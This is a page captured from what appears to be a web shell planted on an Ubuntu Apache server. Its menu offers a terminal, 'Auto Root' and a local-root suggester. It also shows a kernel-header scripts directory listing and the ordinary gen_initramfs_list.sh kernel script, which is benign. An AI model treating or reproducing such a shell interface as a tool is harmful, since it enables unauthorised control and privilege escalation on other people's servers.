Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
linux-headers-4.4.0-209-generic /
scripts /
Delete
Unzip
Name
Size
Permission
Date
Action
basic
[ DIR ]
drwxr-xr-x
2021-04-17 08:01
coccinelle
[ DIR ]
drwxr-xr-x
2021-04-17 08:00
dtc
[ DIR ]
drwxr-xr-x
2021-04-17 08:01
gdb
[ DIR ]
drwxr-xr-x
2021-04-17 08:01
genksyms
[ DIR ]
drwxr-xr-x
2021-04-17 08:01
kconfig
[ DIR ]
drwxr-xr-x
2021-04-17 08:01
ksymoops
[ DIR ]
drwxr-xr-x
2021-04-17 08:01
mod
[ DIR ]
drwxr-xr-x
2021-04-17 08:01
package
[ DIR ]
drwxr-xr-x
2021-04-17 08:01
selinux
[ DIR ]
drwxr-xr-x
2021-04-17 08:01
tracing
[ DIR ]
drwxr-xr-x
2021-04-17 08:01
.asn1_compiler.cmd
3.18
KB
-rw-r--r--
2021-04-13 04:32
.conmakehash.cmd
2.33
KB
-rw-r--r--
2021-04-13 04:32
.extract-cert.cmd
4.39
KB
-rw-r--r--
2021-04-13 04:32
.insert-sys-cert.cmd
3.88
KB
-rw-r--r--
2021-04-13 04:32
.kallsyms.cmd
2.32
KB
-rw-r--r--
2021-04-13 04:32
.recordmcount.cmd
3.31
KB
-rw-r--r--
2021-04-13 04:32
.sign-file.cmd
5.01
KB
-rw-r--r--
2021-04-13 04:32
.sortextable.cmd
3.48
KB
-rw-r--r--
2021-04-13 04:32
Kbuild.include
13.37
KB
-rw-r--r--
2021-04-13 03:05
Lindent
496
B
-rwxr-xr-x
2016-01-11 00:01
Makefile
2.03
KB
-rw-r--r--
2021-04-13 03:05
Makefile.asm-generic
683
B
-rw-r--r--
2016-01-11 00:01
Makefile.build
17.16
KB
-rw-r--r--
2021-04-13 03:05
Makefile.clean
2.83
KB
-rw-r--r--
2016-01-11 00:01
Makefile.dtbinst
1.41
KB
-rw-r--r--
2016-01-11 00:01
Makefile.extrawarn
2.54
KB
-rw-r--r--
2021-04-13 03:05
Makefile.fwinst
2.01
KB
-rw-r--r--
2016-01-11 00:01
Makefile.headersinst
4.65
KB
-rw-r--r--
2016-01-11 00:01
Makefile.help
68
B
-rw-r--r--
2016-01-11 00:01
Makefile.host
4.51
KB
-rw-r--r--
2016-01-11 00:01
Makefile.kasan
976
B
-rw-r--r--
2021-04-13 03:05
Makefile.lib
14.9
KB
-rw-r--r--
2021-04-13 03:05
Makefile.modbuiltin
1.78
KB
-rw-r--r--
2016-01-11 00:01
Makefile.modinst
1.43
KB
-rw-r--r--
2021-04-13 03:05
Makefile.modpost
5.25
KB
-rw-r--r--
2021-04-13 03:05
Makefile.modsign
1005
B
-rw-r--r--
2016-01-11 00:01
analyze_suspend.py
117.57
KB
-rwxr-xr-x
2016-01-11 00:01
asn1_compiler
27.3
KB
-rwxr-xr-x
2021-04-13 04:32
asn1_compiler.c
35.54
KB
-rw-r--r--
2016-01-11 00:01
bloat-o-meter
1.9
KB
-rwxr-xr-x
2021-04-13 03:05
bootgraph.pl
6.28
KB
-rwxr-xr-x
2016-01-11 00:01
check-lc_ctype.c
201
B
-rw-r--r--
2016-01-11 00:01
check_extable.sh
4.9
KB
-rwxr-xr-x
2016-01-11 00:01
checkincludes.pl
1.77
KB
-rwxr-xr-x
2016-01-11 00:01
checkkconfigsymbols.py
11.44
KB
-rwxr-xr-x
2016-01-11 00:01
checkpatch.pl
169.77
KB
-rwxr-xr-x
2021-04-13 03:05
checkstack.pl
5.39
KB
-rwxr-xr-x
2021-04-13 03:05
checksyscalls.sh
5.62
KB
-rwxr-xr-x
2016-01-11 00:01
checkversion.pl
1.86
KB
-rwxr-xr-x
2016-01-11 00:01
cleanfile
3.41
KB
-rwxr-xr-x
2016-01-11 00:01
cleanpatch
5.01
KB
-rwxr-xr-x
2016-01-11 00:01
coccicheck
4.66
KB
-rwxr-xr-x
2016-01-11 00:01
config
4.6
KB
-rwxr-xr-x
2021-04-13 03:05
conmakehash
13.2
KB
-rwxr-xr-x
2021-04-13 04:32
conmakehash.c
5.98
KB
-rw-r--r--
2016-01-11 00:01
decode_stacktrace.sh
3.15
KB
-rwxr-xr-x
2021-04-13 03:05
decodecode
2.15
KB
-rwxr-xr-x
2021-04-13 03:05
depmod.sh
1.9
KB
-rwxr-xr-x
2021-04-13 03:05
diffconfig
3.68
KB
-rwxr-xr-x
2016-01-11 00:01
docproc.c
13.8
KB
-rw-r--r--
2016-01-11 00:01
export_report.pl
4.53
KB
-rwxr-xr-x
2016-01-11 00:01
extract-cert
14.27
KB
-rwxr-xr-x
2021-04-13 04:32
extract-cert.c
3.46
KB
-rw-r--r--
2016-01-11 00:01
extract-ikconfig
1.69
KB
-rwxr-xr-x
2016-01-11 00:01
extract-module-sig.pl
3.61
KB
-rwxr-xr-x
2016-01-11 00:01
extract-sys-certs.pl
3.7
KB
-rwxr-xr-x
2021-04-13 03:05
extract-vmlinux
1.6
KB
-rwxr-xr-x
2016-01-11 00:01
gcc-goto.sh
495
B
-rwxr-xr-x
2016-01-11 00:01
gcc-ld
676
B
-rwxr-xr-x
2016-01-11 00:01
gcc-version.sh
822
B
-rwxr-xr-x
2016-01-11 00:01
gcc-x86_32-has-stack-protector.sh
184
B
-rwxr-xr-x
2016-01-11 00:01
gcc-x86_64-has-stack-protector.sh
209
B
-rwxr-xr-x
2021-04-13 03:05
gen_initramfs_list.sh
7.87
KB
-rwxr-xr-x
2016-01-11 00:01
get_maintainer.pl
58.29
KB
-rwxr-xr-x
2016-01-11 00:01
gfp-translate
1.71
KB
-rwxr-xr-x
2016-01-11 00:01
headerdep.pl
3.46
KB
-rwxr-xr-x
2016-01-11 00:01
headers.sh
477
B
-rwxr-xr-x
2016-01-11 00:01
headers_check.pl
3.6
KB
-rwxr-xr-x
2016-01-11 00:01
headers_install.sh
1.28
KB
-rwxr-xr-x
2016-01-11 00:01
insert-sys-cert
18.59
KB
-rwxr-xr-x
2021-04-13 04:32
insert-sys-cert.c
13.08
KB
-rw-r--r--
2021-04-13 03:05
kallsyms
18.62
KB
-rwxr-xr-x
2021-04-13 04:32
kallsyms.c
16.8
KB
-rw-r--r--
2021-04-13 03:05
kernel-doc
76.08
KB
-rwxr-xr-x
2021-04-13 03:05
kernel-doc-xml-ref
4.22
KB
-rwxr-xr-x
2016-01-11 00:01
ld-version.sh
207
B
-rwxr-xr-x
2021-04-13 03:05
link-vmlinux.sh
5.84
KB
-rwxr-xr-x
2021-04-13 03:05
makelst
773
B
-rwxr-xr-x
2016-01-11 00:01
markup_oops.pl
8.08
KB
-rwxr-xr-x
2016-01-11 00:01
mkcompile_h
2.46
KB
-rwxr-xr-x
2016-01-11 00:01
mkmakefile
1.16
KB
-rwxr-xr-x
2016-01-11 00:01
mksysmap
1.33
KB
-rwxr-xr-x
2021-04-13 03:05
mkuboot.sh
379
B
-rwxr-xr-x
2016-01-11 00:01
mkversion
74
B
-rw-r--r--
2016-01-11 00:01
module-common.lds
888
B
-rw-r--r--
2021-04-13 03:05
namespace.pl
13.13
KB
-rwxr-xr-x
2021-04-13 03:05
objdiff
2.69
KB
-rwxr-xr-x
2016-01-11 00:01
patch-kernel
9.91
KB
-rwxr-xr-x
2016-01-11 00:01
pnmtologo.c
11.91
KB
-rw-r--r--
2016-01-11 00:01
profile2linkerlist.pl
375
B
-rwxr-xr-x
2016-01-11 00:01
recordmcount
24
KB
-rwxr-xr-x
2021-04-13 04:32
recordmcount.c
15.31
KB
-rw-r--r--
2021-04-13 03:05
recordmcount.h
16.4
KB
-rw-r--r--
2021-04-13 03:05
recordmcount.pl
18.3
KB
-rwxr-xr-x
2021-04-13 03:05
setlocalversion
4.69
KB
-rwxr-xr-x
2021-04-13 03:05
show_delta
2.99
KB
-rwxr-xr-x
2016-01-11 00:01
sign-file
18.95
KB
-rwxr-xr-x
2021-04-13 04:32
sign-file.c
8.14
KB
-rwxr-xr-x
2016-01-11 00:01
sortextable
18.04
KB
-rwxr-xr-x
2021-04-13 04:32
sortextable.c
7.65
KB
-rw-r--r--
2016-01-11 00:01
sortextable.h
5.48
KB
-rw-r--r--
2016-01-11 00:01
spelling.txt
21.33
KB
-rw-r--r--
2016-01-11 00:01
stackdelta
1.8
KB
-rwxr-xr-x
2016-01-11 00:01
stackusage
759
B
-rwxr-xr-x
2016-01-11 00:01
tags.sh
10.58
KB
-rwxr-xr-x
2021-04-13 03:05
ubuntu-retpoline-extract-one
7.26
KB
-rw-r--r--
2021-04-13 04:32
unifdef.c
34.8
KB
-rw-r--r--
2021-04-13 03:05
ver_linux
3.89
KB
-rwxr-xr-x
2016-01-11 00:01
xen-hypercalls.sh
351
B
-rw-r--r--
2016-01-11 00:01
xz_wrap.sh
562
B
-rwxr-xr-x
2016-01-11 00:01
Save
Rename
#!/bin/sh # Copyright (C) Martin Schlemmer <azarah@nosferatu.za.org> # Copyright (C) 2006 Sam Ravnborg <sam@ravnborg.org> # # Released under the terms of the GNU GPL # # Generate a cpio packed initramfs. It uses gen_init_cpio to generate # the cpio archive, and then compresses it. # The script may also be used to generate the inputfile used for gen_init_cpio # This script assumes that gen_init_cpio is located in usr/ directory # error out on errors set -e usage() { cat << EOF Usage: $0 [-o <file>] [-u <uid>] [-g <gid>] {-d | <cpio_source>} ... -o <file> Create compressed initramfs file named <file> using gen_init_cpio and compressor depending on the extension -u <uid> User ID to map to user ID 0 (root). <uid> is only meaningful if <cpio_source> is a directory. "squash" forces all files to uid 0. -g <gid> Group ID to map to group ID 0 (root). <gid> is only meaningful if <cpio_source> is a directory. "squash" forces all files to gid 0. <cpio_source> File list or directory for cpio archive. If <cpio_source> is a .cpio file it will be used as direct input to initramfs. -d Output the default cpio list. All options except -o and -l may be repeated and are interpreted sequentially and immediately. -u and -g states are preserved across <cpio_source> options so an explicit "-u 0 -g 0" is required to reset the root/group mapping. EOF } # awk style field access # $1 - field number; rest is argument string field() { shift $1 ; echo $1 } list_default_initramfs() { # echo usr/kinit/kinit : } default_initramfs() { cat <<-EOF >> ${output} # This is a very simple, default initramfs dir /dev 0755 0 0 nod /dev/console 0600 0 0 c 5 1 dir /root 0700 0 0 # file /kinit usr/kinit/kinit 0755 0 0 # slink /init kinit 0755 0 0 EOF } filetype() { local argv1="$1" # symlink test must come before file test if [ -L "${argv1}" ]; then echo "slink" elif [ -f "${argv1}" ]; then echo "file" elif [ -d "${argv1}" ]; then echo "dir" elif [ -b "${argv1}" -o -c "${argv1}" ]; then echo "nod" elif [ -p "${argv1}" ]; then echo "pipe" elif [ -S "${argv1}" ]; then echo "sock" else echo "invalid" fi return 0 } list_print_mtime() { : } print_mtime() { local my_mtime="0" if [ -e "$1" ]; then my_mtime=$(find "$1" -printf "%T@\n" | sort -r | head -n 1) fi echo "# Last modified: ${my_mtime}" >> ${output} echo "" >> ${output} } list_parse() { [ ! -L "$1" ] && echo "$1 \\" || : } # for each file print a line in following format # <filetype> <name> <path to file> <octal mode> <uid> <gid> # for links, devices etc the format differs. See gen_init_cpio for details parse() { local location="$1" local name="/${location#${srcdir}}" # change '//' into '/' name=$(echo "$name" | sed -e 's://*:/:g') local mode="$2" local uid="$3" local gid="$4" local ftype=$(filetype "${location}") # remap uid/gid to 0 if necessary [ "$root_uid" = "squash" ] && uid=0 || [ "$uid" -eq "$root_uid" ] && uid=0 [ "$root_gid" = "squash" ] && gid=0 || [ "$gid" -eq "$root_gid" ] && gid=0 local str="${mode} ${uid} ${gid}" [ "${ftype}" = "invalid" ] && return 0 [ "${location}" = "${srcdir}" ] && return 0 case "${ftype}" in "file") str="${ftype} ${name} ${location} ${str}" ;; "nod") local dev=`LC_ALL=C ls -l "${location}"` local maj=`field 5 ${dev}` local min=`field 6 ${dev}` maj=${maj%,} [ -b "${location}" ] && dev="b" || dev="c" str="${ftype} ${name} ${str} ${dev} ${maj} ${min}" ;; "slink") local target=`readlink "${location}"` str="${ftype} ${name} ${target} ${str}" ;; *) str="${ftype} ${name} ${str}" ;; esac echo "${str}" >> ${output} return 0 } unknown_option() { printf "ERROR: unknown option \"$arg\"\n" >&2 printf "If the filename validly begins with '-', " >&2 printf "then it must be prefixed\n" >&2 printf "by './' so that it won't be interpreted as an option." >&2 printf "\n" >&2 usage >&2 exit 1 } list_header() { : } header() { printf "\n#####################\n# $1\n" >> ${output} } # process one directory (incl sub-directories) dir_filelist() { ${dep_list}header "$1" srcdir=$(echo "$1" | sed -e 's://*:/:g') dirlist=$(find "${srcdir}" -printf "%p %m %U %G\n") # If $dirlist is only one line, then the directory is empty if [ "$(echo "${dirlist}" | wc -l)" -gt 1 ]; then ${dep_list}print_mtime "$1" echo "${dirlist}" | \ while read x; do ${dep_list}parse ${x} done fi } # if only one file is specified and it is .cpio file then use it direct as fs # if a directory is specified then add all files in given direcotry to fs # if a regular file is specified assume it is in gen_initramfs format input_file() { source="$1" if [ -f "$1" ]; then ${dep_list}header "$1" is_cpio="$(echo "$1" | sed 's/^.*\.cpio\(\..*\)\?/cpio/')" if [ $2 -eq 0 -a ${is_cpio} = "cpio" ]; then cpio_file=$1 echo "$1" | grep -q '^.*\.cpio\..*' && is_cpio_compressed="compressed" [ ! -z ${dep_list} ] && echo "$1" return 0 fi if [ -z ${dep_list} ]; then print_mtime "$1" >> ${output} cat "$1" >> ${output} else echo "$1 \\" cat "$1" | while read type dir file perm ; do if [ "$type" = "file" ]; then echo "$file \\"; fi done fi elif [ -d "$1" ]; then dir_filelist "$1" else echo " ${prog}: Cannot open '$1'" >&2 exit 1 fi } prog=$0 root_uid=0 root_gid=0 dep_list= cpio_file= cpio_list= output="/dev/stdout" output_file="" is_cpio_compressed= compr="gzip -n -9 -f" arg="$1" case "$arg" in "-l") # files included in initramfs - used by kbuild dep_list="list_" echo "deps_initramfs := $0 \\" shift ;; "-o") # generate compressed cpio image named $1 shift output_file="$1" cpio_list="$(mktemp ${TMPDIR:-/tmp}/cpiolist.XXXXXX)" output=${cpio_list} echo "$output_file" | grep -q "\.gz$" \ && [ -x "`which gzip 2> /dev/null`" ] \ && compr="gzip -n -9 -f" echo "$output_file" | grep -q "\.bz2$" \ && [ -x "`which bzip2 2> /dev/null`" ] \ && compr="bzip2 -9 -f" echo "$output_file" | grep -q "\.lzma$" \ && [ -x "`which lzma 2> /dev/null`" ] \ && compr="lzma -9 -f" echo "$output_file" | grep -q "\.xz$" \ && [ -x "`which xz 2> /dev/null`" ] \ && compr="xz --check=crc32 --lzma2=dict=1MiB" echo "$output_file" | grep -q "\.lzo$" \ && [ -x "`which lzop 2> /dev/null`" ] \ && compr="lzop -9 -f" echo "$output_file" | grep -q "\.lz4$" \ && [ -x "`which lz4 2> /dev/null`" ] \ && compr="lz4 -l -9 -f" echo "$output_file" | grep -q "\.cpio$" && compr="cat" shift ;; esac while [ $# -gt 0 ]; do arg="$1" shift case "$arg" in "-u") # map $1 to uid=0 (root) root_uid="$1" shift ;; "-g") # map $1 to gid=0 (root) root_gid="$1" shift ;; "-d") # display default initramfs list default_list="$arg" ${dep_list}default_initramfs ;; "-h") usage exit 0 ;; *) case "$arg" in "-"*) unknown_option ;; *) # input file/dir - process it input_file "$arg" "$#" ;; esac ;; esac done # If output_file is set we will generate cpio archive and compress it # we are careful to delete tmp files if [ ! -z ${output_file} ]; then if [ -z ${cpio_file} ]; then timestamp= if test -n "$KBUILD_BUILD_TIMESTAMP"; then timestamp="$(date -d"$KBUILD_BUILD_TIMESTAMP" +%s || :)" if test -n "$timestamp"; then timestamp="-t $timestamp" fi fi cpio_tfile="$(mktemp ${TMPDIR:-/tmp}/cpiofile.XXXXXX)" usr/gen_init_cpio $timestamp ${cpio_list} > ${cpio_tfile} else cpio_tfile=${cpio_file} fi rm ${cpio_list} if [ "${is_cpio_compressed}" = "compressed" ]; then cat ${cpio_tfile} > ${output_file} else (cat ${cpio_tfile} | ${compr} - > ${output_file}) \ || (rm -f ${output_file} ; false) fi [ -z ${cpio_file} ] && rm ${cpio_tfile} fi exit 0